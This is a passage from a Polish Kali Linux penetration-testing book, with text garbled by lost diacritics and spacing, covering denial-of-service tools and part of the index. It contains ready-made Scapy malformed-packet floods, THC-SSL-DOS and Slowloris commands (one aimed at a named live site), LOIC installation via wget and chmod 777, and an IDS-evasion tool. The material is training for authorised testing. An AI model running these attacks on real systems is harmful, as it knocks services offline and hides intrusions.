Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
